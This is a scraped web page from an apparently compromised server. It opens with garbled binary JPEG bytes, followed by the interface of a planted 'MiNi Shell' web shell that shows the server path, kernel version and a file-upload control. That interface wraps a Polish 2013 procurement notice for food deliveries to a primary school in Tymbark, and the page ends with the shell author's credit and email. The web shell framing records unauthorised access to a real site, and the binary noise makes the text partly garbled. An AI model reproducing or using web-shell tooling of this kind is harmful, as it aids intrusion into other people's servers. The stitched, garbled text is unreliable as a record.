JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20131213/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20131213/271881-N-2013.html

<p class="kh_header"><b>Tymbark: Dostawa artykułów żywnościowych dla Szkoły Podstawowej im. Józefa Marka w Tymbarku w roku 2014.</b><br>
<b>Numer ogłoszenia: 271881 - 2013; data zamieszczenia: 13.12.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Szkoła Podstawowa im.Józefa Marka w Tymbarku , Tymbark 354, 34-650 Tymbark, woj. małopolskie, tel. 18 3325280, faks 18 3325280.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.sp.tymbark.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: ednostka oświatowa utworzona przez JST.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa artykułów żywnościowych dla Szkoły Podstawowej im. Józefa Marka w Tymbarku w roku 2014..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa artykułów żywnościowych dla Szkoły Podstawowej w Tymbarku im. Józefa Marka, 34-650 Tymbark 354
Zamawiający dopuszcza składanie ofert częściowych.

Dostawa oznaczona jako Część I świeże warzywa i owoce będzie obejmować
Ziemniaki	4080	kg
Marchew	640	kg
Pietruszka korzeń	320	kg
Seler	520	kg
Kapusta kiszona 1 kg woreczek 696	kg
Kapusta czerwona 	280	kg
Kapusta pekińska	192	szt
Pieczarka świeża	160	kg
Groch łuskany luzem	480	kg
Kapusta biała	64	kg
Burak ćwikłowy	280	kg
Ogórki kiszone (350g), woreczek foliowy 	80	szt
Jabłka 1 klasa Champion lub równoważne	128	kg
Cebula	96	kg
Fasola Jasiek 400g	40	szt
Natka  pietruszki   ( pęczek)	144	pęczki
Koper świeży	80	szt

Dostawa oznaczona jako Część II wyroby piekarskie będzie obejmować:

Bułka zwykła ( 100g)	11040	 szt.
Chleb pszenny ( 550g) 	3040	 szt. 

Dostawa oznaczona jako Część III mrożone artykuły spożywcze będzie obejmować:

Mrożonka kompotowa 6 składnikowa zamrożona w op. do 500g	281	kg
Mrożonka 6 składnikowa warzywna zamrożona w op. do 500 g	200	kg
Kalafior mrożony w op. do 500 g	152	kg
Fasola mrożona zielona szparagowa w op. do 500 g	102	szt
Truskawka mrożona bez szypułek w op. do 500 g	64	kg
Zupa pieczarkowa mrożona w op. do 500 g zaw. pieczarka ok. 25%	144	kg
Pyzy z mięsem mrożone w op. do 500 g zaw.grysik ziemniaczany, mięso wieprzowe 9%, wołowe 4, 5 %	184	kg
Filet z pangi bez glazury ( SHP)	208	kg
Filet z mintaja 10% glazury ( SHP)	208	kg
Filet z miruny (SHP)	104	kg

Dostawa oznaczona jako Część IV artykuły spożywcze sypkie, koncentraty, przyprawy i desery :
Majonez stołowy 850 g zaw.olej roślinny, woda, ocet, musztarda, żółtka kurze 1,1% słoik szklany	112	szt
Jajka ściółkowe kl. I	6000	szt
Olej kujawski z pierwszego tłoczenia butelka z tworzywa sztucznego dopuszczona do żywności 1l	240	szt
Musztarda stołowa 900g słoik szklany	32	szt
Ogórek konserwowy zaw. ogórek, woda, ocet, sól, przyprawy smakowe, słoik szklany masa netto 870g	88	szt
Cukier op. 1 kg	320	kg
Cukier puder op. do 1 kg	9	kg
Mąka poznańska typ 500 op. do 1 kg	360	kg
Mąka ziemniaczana 0,5 kg	16	szt
Ryż biały długoziarnisty	144	kg
Makaron zacierka 250g	403	szt
Makaron świderki 500 g zaw. mąka durum	304	szt
Makaron Spaghetti 500 g zaw. mąka durum	96	szt
Makaron nitki 250 g zaw. mąka, jaja 23,8 %, woda	144	szt
Kasza jęczmienna mazurska op. do 1 kg	80	kg
Kasza manna zaw. gluten	24	kg
Koncentrat pomidorowy 30% 200g, słoik szklany	736	szt
Sól 1kg opakowanie foliowe	136	kg
Barszcz biały 0,66g zaw. mąka pszenna 12,1%, warzywa 0,9%	76	szt
Zupa pieczarkowa w proszku 0, 45 g zaw. grzyby 10,5%,warzywa 2%	432	szt
Żurek śląski 45g zaw. mąka żytnia 14,6%, boczek prażony 5,5 %, tłuszcz roślinny	387	szt
Zupa grochowa w proszku 0, 75 g zaw. mąka grochowa 61%, tłuszcz wędzony wieprzowy 4,5 %	432	szt
Przyprawa do zup, sosów, magii - woda, sól substancje wzmacniające, glutamin sodu E635, butelka szklana o poj. 1l	128	szt
Przyprawa warzywna do potraw 200g Vegeta lub równoważna zawierająca suszone warzywa 15,5 % (marchew, pasternak, ziemniaki, cebula, seler, natka pietruszki), skrobia kukurydziane, węglowodany 24,5%	392	szt
Sos pieczeniowy ciemny zaw. mąka pszenna, ryżowa, warzywa suszone 2, 7% zapach E 635	240	szt
Sos do Spaghetti, warzywa suszone 48% zioła 1%	60	szt
Sos słodko- kwaśny zaw.warzywa :marchew9%, cebula 9%, pomidory 8,3, papryka czerwona 8%	144	szt
Rosół z kury w kostkach  zaw. sól, tłuszcz roślinny i i kurzy 3%, ekstrakt mięsa kurzego 0,1%. W opakowaniu 18 kostek 180g	96	opak
Pieprz mielony naturalny 20 g	136	szt
Papryka słodka i ostra mielona 20g	160	szt
Liść laurowy 0,15 g	160	szt
Czosnek granulowany 20 g	200	szt
Ziele angielskie 12 g	160	szt
Majeranek 5g	320	szt
Zupa ogonowa w proszku pomidor 21,4%, papryka 1,5%, cebula 0,8%, tłuszcz roślinny 40 g	336	szt
Bułka tarta	144	kg

Dostawa oznaczona jako Część V  mięso świeże, wędliny i drób:

Filet z kurczaka	392	kg
Schab bez kości	288	kg
Karczek bez kości 	392	kg
Kości wieprzowe	432	kg
Ćwiartka z kurczaka	680	kg
Łopatka wieprzowa bez kości	1280	kg
Parówka z indyka	112	kg
Kiełbasa zwyczajna kotlarska	360	kg
Żeberka wieprzowe ekstra	32	kg
Wątróbka drobiowa	24	kg
Smalec 200g w kostkach	400	szt
Kiełbasa toruńska	97	kg
Filet z indyka	272	kg

Dostawa oznaczona jako Część VI  mleko i produkty mleczarskie:


Śmietana ukwaszona 15% 500g 	384	szt
Mleko 3,2% woreczek do 1l	48	litr
Masło ekstra 200g zaw. tłuszczu 82 %	592	szt
Margaryna 250g zaw. tł. palmowego 30%, olej roślinny 0,3%, og. Zaw. Tłuszczu 80%	608	szt
Ser biały tłusty zawartość tłuszczu min. 7%	144	kg
Śmietana kremowa 30% pasteryzowana 400g	960	szt

 Przedmiot zamówienia obejmuje sukcesywną dostawę artykułów spożywczych:
1.Przez dostawę Zamawiający rozumie cykliczne dostawy towaru na podstawie zamówienia dostosowanego do jego potrzeb, składanych przez upoważnioną osobę Zamawiającego. 
2.Transport artykułów winien być wykonywany środkami transportu spełniającymi wymagania sanitarne (w tym dotyczące czynności związane z załadunkiem i rozładunkiem). 
3.Wykonawca zobowiązuje się dostarczyć towar do siedziby Zamawiającego własnym transportem, na własny koszt i własne ryzyko oraz do elastycznego reagowania na zwiększone lub zmniejszone potrzeby Zamawiającego w stosunku do danego asortymentu lub całości dostawy.
4.Na każdym opakowaniu umieszczony będzie m.in. zapis wagi netto oraz data przydatności  spożycia.
5.Jeżeli towar dostarczony przez Wykonawcę będzie miał wady (złą jakość), albo nie odpowiadał pod względem ilościowym, Zamawiający poinformuje o ewentualnych wadach lub brakach ilościowych, w terminie natychmiastowym w dniu otrzymania towaru.
6.Zamawiający może odmówić odbioru dostawy w przypadku braków ilościowych. Wówczas   uznaje się iż Wykonawca nie dotrzymał terminu dostawy.
7.Wykonawca zobowiązuje się do przestrzegania obowiązujących warunków higieniczno -sanitarnych przy produkcji, przechowywaniu i dostawie towaru, który jest przedmiotem zamówienia - za co ponosi pełną odpowiedzialność.
8.Zamawiający odmówi przyjęcia towaru od Wykonawcy nie odpowiadającego wymogom jakościowym lub ilościowym. W takiej sytuacji Wykonawca ma obowiązek wymienić towar na pełnowartościowy lub uzupełnić braki w ciągu 6 godzin.
9.Zamawiający dopuszcza maksymalnie 3 reklamacje w ciągu okresu obowiązywania umowy skutkujące zwrotem lub wyminą towaru wynikającym z niewłaściwej jakości handlowej i zdrowotnej towaru.
10.Kolejna -czwarta reklamacja będzie skutkować odstąpieniem od umowy z winy WYKONAWCY i będzie tu miał zastosowanie §7. Pkt.3 umowy
11.Wykonawca gwarantuje dobrą jakość dostarczanego towaru i oświadcza, że dostarczone artykuły spożywcze są w pierwszym gatunku z określonym terminem ważności oraz cechami podanymi w SIWZ.
12.Dostawy towaru powinny odbywać się w dni robocze w godzinach 8:00-14:00.
13.Data dostawy oraz ilości będą podawane Wykonawcy każdorazowo w formie zamówienia pisemnego lub telefonicznego z co najmniej dwudniowym wyprzedzeniem. 
14.W trakcie realizacji umowy Zamawiający może dokonywać przesunięć ilościowych asortymentu według bieżących potrzeb i celowości ich zakupu co nie skutkuje w stosunku do Wykonawcy roszczeń finansowych i prawnych. 
15.Nie wykonanie pełnego zakresu ilościowego umowy nie rodzi roszczenia o zakup nie zrealizowanej w okresie obowiązywania umowy ilości towaru. 
16.Zamawiający dopuszcza możliwość składania ofert równoważnych, tj. ofert obejmujących artykuły odpowiadające właściwościom artykułów wyszczególnionych w formularzu cenowym. Za produkty równoważne uważa się produkty o parametrach nie gorszych niż parametry produktów wskazanych przez Zamawiającego
17.Termin płatności wynosi do 30 dni licząc od dnia dostarczenia faktury.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8, 15.50.00.00-3, 15.54.00.00-5, 15.10.00.00-9, 15.11.20.00-6, 15.13.11.00-6, 15.30.00.00-1, 03.20.00.00-3, 03.22.22.00-5, 03.14.25.00-3, 15.33.11.00-8, 15.81.10.00-9, 15.20.00.00-0.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 6.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi złożyć oświadczenie o spełnieniu warunków udziału w postępowaniu -załącznik 7 do SIWZ
Ocena spełnienia warunków udziału w postępowaniu dokonywana będzie w oparciu o dokumenty złożone przez wykonawcę w niniejszym postępowaniu metodą warunku granicznego - spełnia/niespełna.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie że wykonawca dysponuje odpowiednim potencjałem osobowym i technicznym niezbędnym do wykonania zadania oraz że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień. (załącznik 12 do SIWZ)
Ocena spełnienia warunków udziału w postępowaniu dokonywana będzie w oparciu o dokumenty złożone przez wykonawcę w niniejszym postępowaniu metodą warunku granicznego - spełnia/niespełna.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie że wykonawca dysponuje odpowiednim potencjałem osobowym i technicznym niezbędnym do wykonania zadania oraz że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień. (załącznik 12 do SIWZ)
Ocena spełnienia warunków udziału w postępowaniu dokonywana będzie w oparciu o dokumenty złożone przez wykonawcę w niniejszym postępowaniu metodą warunku granicznego - spełnia/niespełna.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi złożyć oświadczenie o spełnieniu warunków udziału w postępowaniu -załącznik 7 do SIWZ
Ocena spełnienia warunków udziału w postępowaniu dokonywana będzie w oparciu o dokumenty złożone przez wykonawcę w niniejszym postępowaniu metodą warunku granicznego - spełnia/niespełna.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Formularze ofertowe -  z wykorzystaniem wzoru - załącznik nr 1-6 do  SIWZ - wypełniony dla zadania na które składana jest oferta
Projekt umowy - parafowany z wykorzystaniem wzoru - załącznik nr 8 do SIWZ 
Oferowane warunki gwarancji - z wykorzystaniem wzoru - załącznik nr 9 do SIWZ</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający dopuszcza możliwość zmian do umowy w szczególności zmiany treści i warunków umowy mogą nastąpić w przypadku:
a)Zmiany osób  bezpośrednio biorących udział w realizacji zamówienia  np. Dyrektor Szkoły 
b)Wystąpienia siły wyższej,
Za siłę wyższą warunkującą zmianę umowy uważać się będzie w szczególności: powódź, pożar i inne klęski żywiołowe, zamieszki, strajki, ataki terrorystyczne, działania wojenne, nagłe załamania warunków atmosferycznych, nagłe przerwy w dostawie energii elektrycznej, promieniowanie lub skażenia;
c)Rezygnacji z części zamówienia/zwiększenie zamówienia przez Zamawiającego.
d)Zamawiający dopuszcza zmianę wynagrodzenia- w przypadku zmiany zakresu wykazanego przez Zamawiającego. 
e)Zmiany kluczowego personelu Wykonawcy / Zamawiającego
f)zmiany danych adresowych oraz danych osób odpowiedzialnych za wykonanie zobowiązań umowy po stronie Zamawiającego lub Wykonawcy;
g)zwiększenia bądź zmniejszenia ilości zamawianych produktów w zależności od potrzeb -W przypadku zmniejszenia ilości przedmiotu zamówienia Wykonawcy przysługiwać będzie wynagrodzenie wynikające ze zrealizowanych dostaw, natomiast w przypadku zwiększenia ilości przedmiotu zamówienia Wykonawca otrzyma wynagrodzenie obliczone po cenach określonych w formularzu cenowym.
h)zmiany zamawianego asortymentu jeżeli nastąpi taka konieczność
i)zmian cenowych wynikających z uregulowań prawnych podatku, zmiany urzędowej stawki podatku VAT na oferowany przedmiot zamówienia. Zmiana taka może nastąpić od dnia wejścia w życie podpisanego aneksu do niniejszej umowy na podstawie pisemnego zgłoszenia Wykonawcy. 
j)Siły wyższej
k)Za siłę wyższą warunkującą zmianę umowy uważać się będzie w szczególności: powódź, pożar i inne klęski żywiołowe, zamieszki, strajki, ataki terrorystyczne, działania wojenne, nagłe załamania warunków atmosferycznych, nagłe przerwy w dostawie energii elektrycznej, promieniowanie lub skażenia;
l)Konieczności zmian w zakresie podwykonawstwa tj.
-zmiany podwykonawcy wskazanego w ofercie,
-zmiany części zamówienia którą Wykonawca zamierzał zlecić podwykonawcom,
-wprowadzenie podwykonawcy w przypadku gdy Wykonawca oświadczył w ofercie iż wykona    przedmiot zamówienia bez udziału podwykonawców,
W przypadku zmian w zakresie podwykonawstwa maja zastosowania zapisy § 9 umowy.
Każdorazowo wniosek o zmianę umowy składany przez Wykonawcę/ Zamawiającego musi wpłynąć do Zamawiającego/Wykonawcy w formie pisemnej przed planowanym wprowadzeniem zmian. 
We wniosku o zmianę warunków umowy należy podać czego zmiana dotyczy, dlaczego jest konieczna oraz proponowany termin wprowadzenia zmiany, 
Zmiany do umowy muszą być  wprowadzane aneksem w formie pisemnej po wcześniejszym zaakceptowaniu przez Zamawiającego/Wykonawcę.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.sp.tymbark.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Szkoła Podstawowa im. Józefa Marka
34-650 Tymbark 354
NIP: 737-18-46-226
tel.: 18/3325280, faks: 18/3325280,
Sekretariat.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 23.12.2013 godzina 11:00, miejsce: Szkoła Podstawowa im. Józefa Marka
34-650 Tymbark 354
NIP: 737-18-46-226
tel.: 18/3325280, faks: 18/3325280,
Sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com